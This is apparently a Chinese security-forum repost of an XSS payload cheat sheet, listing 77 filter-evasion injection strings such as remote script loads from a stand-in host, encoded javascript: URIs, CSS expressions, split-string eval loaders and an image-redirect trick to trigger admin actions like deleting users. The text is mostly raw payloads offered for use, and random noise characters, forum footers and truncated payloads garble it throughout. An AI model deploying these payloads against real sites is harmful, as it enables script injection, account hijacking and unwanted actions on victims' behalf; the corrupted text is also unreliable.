貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。% A2 V9 @- |$ H! M" i% |( s
(1)普通的XSS JavaScript注入3 k& T: |5 P) t' X6 G/ p$ m, B- q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 J4 o8 I. L9 S) i
(2)IMG标签XSS使用JavaScript命令2 N; i+ }) A* f/ M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 {5 d) Z# g# k. O% u6 U(3)IMG标签无分号无引号, E% p7 k) t5 D" D( j' p) g% n+ g
<IMG SRC=javascript:alert(‘XSS’)>
0 r. J! Y" l- ?( u6 D(4)IMG标签大小写不敏感
$ P6 L( `$ k9 g, v! {0 {4 Z& b<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, |7 `. Y; c- B, Q g
(5)HTML编码(必须有分号), u& O5 A0 ^! [7 X5 g
<IMG SRC=javascript:alert(“XSS”)>9 W3 @, E+ i$ G/ W" h1 L
(6)修正缺陷IMG标签$ |6 x) O# k0 ^5 N8 I; A
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* W* {6 @: |9 y9 [
+ J: K& ~) O1 j/ B X
% D8 b& W% E& I& i f(7)formCharCode标签(计算器)& ?$ X5 k7 O! U' ?: i* K
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 y# L% h9 `% T0 G B(8)UTF-8的Unicode编码(计算器)8 o+ g5 t- ]+ W1 }2 k5 y
<IMG SRC=jav..省略..S')># _0 J, i( _2 _0 T# ?
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) f; l) X/ N$ W' u% W$ w3 E& c$ H<IMG SRC=jav..省略..S')>; O* H5 v- V5 }6 S" `
(10)十六进制编码也是没有分号(计算器): y) g( X, y* [% [& x1 K6 H p2 U
<IMG SRC=java..省略..XSS')>) b3 e8 G3 A- q3 u9 i
(11)嵌入式标签,将Javascript分开
: f) b2 p* @. }- E$ g<IMG SRC=”jav ascript:alert(‘XSS’);”>5 \0 m1 b6 Q* M& ]8 Y- [2 h$ V
(12)嵌入式编码标签,将Javascript分开
, |' A. ^1 `. a6 Z( Q) s<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 h1 Q; [ _7 ~; e5 m(13)嵌入式换行符
9 \( f [4 H; O4 D. U<IMG SRC=”jav ascript:alert(‘XSS’);”>
* ], P/ ~ `. b4 i; s(14)嵌入式回车( o+ C) }$ c/ F7 k
<IMG SRC=”jav ascript:alert(‘XSS’);”>. T" h O, y6 w+ {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% b: K" ?- c! n<IMG SRC=”javascript:alert(‘XSS‘)”>) T0 X$ K; C4 {6 |0 w
(16)解决限制字符(要求同页面)9 _+ L' @; D/ m& o7 Z$ ?
<script>z=’document.’</script>
; I5 s0 B4 |. ~! D F<script>z=z+’write(“‘</script># x- W) @$ X. r+ J- e! G) q
<script>z=z+’<script’</script>
1 d( ^9 l# \3 A7 D' m0 i2 s, {<script>z=z+’ src=ht’</script>5 L) w R. |- ~6 B; ?& M
<script>z=z+’tp://ww’</script>
# l% G7 |& _: i# K' C$ l<script>z=z+’w.shell’</script>2 H) s1 N# ~. [* j# S( K: G: E
<script>z=z+’.net/1.’</script>
9 K5 y' a* ?+ q. z<script>z=z+’js></sc’</script>
3 E' i+ s7 B$ n% Y. Q3 P) ]* d7 ~<script>z=z+’ript>”)’</script>
8 c P4 g e1 ~& p2 |<script>eval_r(z)</script>0 \% {4 K# {" D" f; w
(17)空字符12-7-1 T00LS - Powered by Discuz! Board3 |$ q8 X2 `" z g, F" q* Z* B
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
. C/ y, a/ w4 o- V& [perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 ?4 u8 [3 J$ N; s6 N* @(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: |- x8 {- N) j/ S* [
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
: B% j# b! A1 U8 j/ n2 ?9 r(19)Spaces和meta前的IMG标签 r+ m3 h; u' G8 w) p
<IMG SRC=” javascript:alert(‘XSS’);”>$ x# Z$ f6 D: F# z6 M! O) Y
(20)Non-alpha-non-digit XSS0 A! r/ u# @4 D
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, O5 e0 A5 l# G! Y- H7 a2 Y) R+ @" Y(21)Non-alpha-non-digit XSS to 2( G' p$ x/ P6 W7 C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: ]7 E: h# K5 n& r
(22)Non-alpha-non-digit XSS to 3, [- T8 M' v& k- \0 L
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, C: k: J9 \( k( t# s$ E
(23)双开括号6 i% s l" G4 R3 V% M% U: L
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
' E$ H( H2 Z0 w5 K- J(24)无结束脚本标记(仅火狐等浏览器)
3 G. Q1 T, ^% T4 M* p<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>) O l K. w" A( l& ]
(25)无结束脚本标记2
2 ^- U4 G4 x# x; J+ G. b<SCRIPT SRC=//3w.org/XSS/xss.js>
/ @/ u7 z6 P3 {; ?(26)半开的HTML/JavaScript XSS
, Y4 I- s' @5 m/ k) U6 I/ ^! ]<IMG SRC=”javascript:alert(‘XSS’)”
: c1 {: _, o& V: o# n+ S# {7 L, |8 N" |(27)双开角括号
. w9 P) x( A* s3 q6 ?* s8 B0 v<iframe src=http://3w.org/XSS.html <6 I4 q% k# F4 `8 ?
(28)无单引号 双引号 分号. i3 |- s$ I3 k$ f
<SCRIPT>a=/XSS/3 ?2 R$ d6 n* P* C
alert(a.source)</SCRIPT># G8 G2 c- {4 }$ P+ z) D$ d3 V
(29)换码过滤的JavaScript
% H6 r+ o2 b6 Y" h\”;alert(‘XSS’);//
9 P* ]; w' F( W(30)结束Title标签# d6 C9 \, R8 Z: d6 X# {7 f
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 T) J! ^ Z4 l# Q: G! E) V0 i! C7 b(31)Input Image8 I# R' K* C6 }8 w7 ?: @
<INPUT SRC=”javascript:alert(‘XSS’);”>; X; C+ @- [( d' O
(32)BODY Image2 |, c, Y& `! K! j8 r2 e
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, ]3 J' d; \& A7 m7 A+ s# x
(33)BODY标签
8 p# i6 T( M h7 W& }" d<BODY(‘XSS’)>+ g9 `7 z( V& d6 b# J5 A/ ~
(34)IMG Dynsrc% [, Y2 T/ c4 J! K% N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
& a! b4 o6 X. m5 k/ ](35)IMG Lowsrc* ]9 n* b: W8 B3 A9 Q+ J1 z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# i& I) N S4 r: T5 d9 n(36)BGSOUND
4 S, m1 a, _, K$ `0 V; k3 m- ]4 v<BGSOUND SRC=”javascript:alert(‘XSS’);”>
' s) o0 [: e1 [/ A( r(37)STYLE sheet
1 o2 V7 @7 u: m, n0 y- l<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- g9 [6 r; G* ~, n$ U$ b(38)远程样式表- O* n; V9 u, K$ _
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& ~$ Y) V0 N3 |. A
(39)List-style-image(列表式)+ V$ S, _% J( Y; M" B. O; c# l) P. U
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: T; q R; G; R! f2 B0 D. d(40)IMG VBscript
7 P" i: b" j( y/ @6 Y, }2 |<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS) k+ f( M8 z+ X2 o7 d& [0 l
(41)META链接url# J; B" X6 n {. g- |+ Y/ M T+ |2 c
9 M4 i4 L4 W, n b( J: t0 r" k: J: r- f( D3 K5 E* \! u! ^* S
<META HTTP-EQUIV=”refresh” CONTENT=”0;4 N, H/ y1 y% h5 T2 q. Y% x, w
URL=http://;URL=javascript:alert(‘XSS’);”>5 v( u: e4 k& Q6 |; `8 Q$ I1 E0 ~
(42)Iframe4 A, }, O; t; y5 [/ Y9 h# L/ U
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>3 d5 q( T. _* V: c. @! W
(43)Frame
' Z. J0 f7 g* n+ B- X1 V7 D9 Z<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
4 W/ r- o3 p9 N* [https://www.t00ls.net/viewthread ... table&tid=15267 3/6 i9 S( K7 M0 C$ o3 O2 W
(44)Table
8 R0 q$ g) N4 G z- B% I<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
" K" }8 [) }% H% G(45)TD" Z7 Z0 G6 Z- Y( `6 p/ M$ ]* S
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 C3 |# `0 s3 e) v(46)DIV background-image
# Y' g6 ^, Z" n2 i( y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 q* }3 B+ w+ Z) S6 R1 O0 U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-2 j; D4 X" i- X5 @4 K
8&13&12288&65279)3 p" M# Y$ j" H, q8 r l3 ]8 t
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# s6 e$ b2 \ i3 b(48)DIV expression
+ b' J) s: e( K; f# x<DIV STYLE=”width: expression_r(alert(‘XSS’));”> l& l/ |0 J1 ~) `; G
(49)STYLE属性分拆表达
! z! `1 l+ N% V' s3 t/ A) A4 L' |<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( [1 d% r( l3 ~+ D, Y(50)匿名STYLE(组成:开角号和一个字母开头)
3 l1 H/ e) w* m% Q% l<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>1 e2 R% ~' y) w9 g% {$ r, K
(51)STYLE background-image
2 [+ u+ i V! J0 V! h<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A& ?7 W+ `7 }0 p
CLASS=XSS></A>
" [% D: t! B/ i s6 D) o' `5 @8 F; T* A(52)IMG STYLE方式: ]5 {1 g" R& M- \7 f
exppression(alert(“XSS”))’>% k: K5 M B( \4 X6 ?
(53)STYLE background# I/ | ~$ ~$ f6 n" m1 Y5 I. q
<STYLE><STYLE
M4 c; e$ a/ wtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>. B: m8 r6 b1 a, A1 r% P6 @/ U' B
(54)BASE
3 y f; S$ C: f$ p<BASE HREF=”javascript:alert(‘XSS’);//”>/ f1 |+ X. v k7 j: I1 V, T) `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( I/ j1 s1 p/ G& U8 q" O' w
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
% u* a. _: l. ~* G! o1 X5 ?( S% G( l(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 O9 S) x4 _& o3 y2 b" q6 Wa=”get”;
2 c. h" e" g) Q& B+ \% ib=”URL(\”";
8 B9 x* ?+ c o8 g7 k- jc=”javascript:”;
+ q& ~! p0 a u! N Xd=”alert(‘XSS’);\”)”;
& Q) B) L2 E9 ceval_r(a+b+c+d);
% ?+ H2 R# Z! y- {( J& L(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
& t+ r0 F* `. a: ]" N; f3 ^* C<HTML xmlns:xss>1 G: f" b( {0 l' y& b! Q
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
# l1 I& @9 \. X<xss:xss>XSS</xss:xss>
" s% L8 n' u5 W" K' X) h6 Z3 r</HTML>
( n s9 D8 Q/ F [(58)如果过滤了你的JS你可以在图片里添加JS代码来利用1 H. ]2 G; `5 n( L
<SCRIPT SRC=””></SCRIPT>
4 y9 b/ {! z' E U/ Z* y(59)IMG嵌入式命令,可执行任意命令* w% \8 I; N. n% X) D
<IMG SRC=”http://www.XXX.com/a.php?a=b”>: x$ l$ B4 _ j w: q8 @) T
(60)IMG嵌入式命令(a.jpg在同服务器)% X @ v6 ~ I7 L! {
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser6 B, Y) X2 m- T8 [7 ^
(61)绕符号过滤
h- n7 v' q/ ~2 C5 k0 v5 X- P! U<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ a2 r o$ S! L9 N(62)" j3 I, Y8 V- h& u5 Q9 h
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 A8 C9 c4 \8 o( u ?3 `, H- ^(63)
3 {" ]9 s' _, h3 @3 p. x<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
/ F' t9 W# E3 Z(64)
0 r$ v* C: ?3 n0 z<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
" Y' \; c) W2 x0 E8 J. K% z. y0 x(65)6 B0 J' x$ m( P/ Z0 Y
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>1 Q- p! T# E" \/ i
(66)12-7-1 T00LS - Powered by Discuz! Board5 n; f0 k& D7 B$ u) C
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
# [ u W+ S: I4 R9 O<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
: C' @2 f& w" a(67)' C0 o3 c! y0 j4 o* F: v1 t
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
7 H* R1 P6 [9 S+ Q</SCRIPT>
6 U, ?3 [9 Q# k1 s(68)URL绕行
- x1 A1 P: y; A0 `. R<A HREF=”http://127.0.0.1/”>XSS</A>
- E2 A8 W7 i& j# J(69)URL编码
7 n& K0 I M# q" ?) |<A HREF=”http://3w.org”>XSS</A>. j. n) M6 s5 v, S
(70)IP十进制: ?5 m1 d( X# f/ R; b
<A HREF=”http://3232235521″>XSS</A>
( P8 M, |: `. e. S4 Q8 f! D# C6 ~6 s(71)IP十六进制" Y+ A; i3 \6 x3 x8 d
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>3 _# A a: {1 O/ G
(72)IP八进制6 B( l8 g2 j; x3 L* u2 U/ ?2 A
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
3 t0 J% {* u* W(73)混合编码
; r( P: @* ]' X3 B2 y<A HREF=”h
6 r& H! s: X; ?tt p://6 6.000146.0×7.147/”">XSS</A>
0 ?9 H; y3 Q' Z: Y4 u) O0 t(74)节省[http:]
, ]. t- f- j" m6 p: J* E<A HREF=”//www.google.com/”>XSS</A>
, W7 k8 o+ c" n( [5 e n6 n(75)节省[www]
# [+ ~- ~$ Q* x3 `# u<A HREF=”http://google.com/”>XSS</A>4 @" q( O0 \8 x/ ]( D
(76)绝对点绝对DNS! K# ^- B% |: g9 j. {
<A HREF=”http://www.google.com./”>XSS</A>
8 M9 e" z: p" L+ p(77)javascript链接 J$ r" q/ k8 y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>! \/ [; S9 u, y6 X$ Q8 @: p P U
; G/ j' V. I: Z# X5 d8 c
原文地址:http://fuzzexp.org/u/0day/?p=14
/ l! j- x9 _0 `3 H+ X7 C
- P: A1 _, a6 K8 N) U8 F |
发表于 2013-4-19 19:22:37
收藏
支持
反对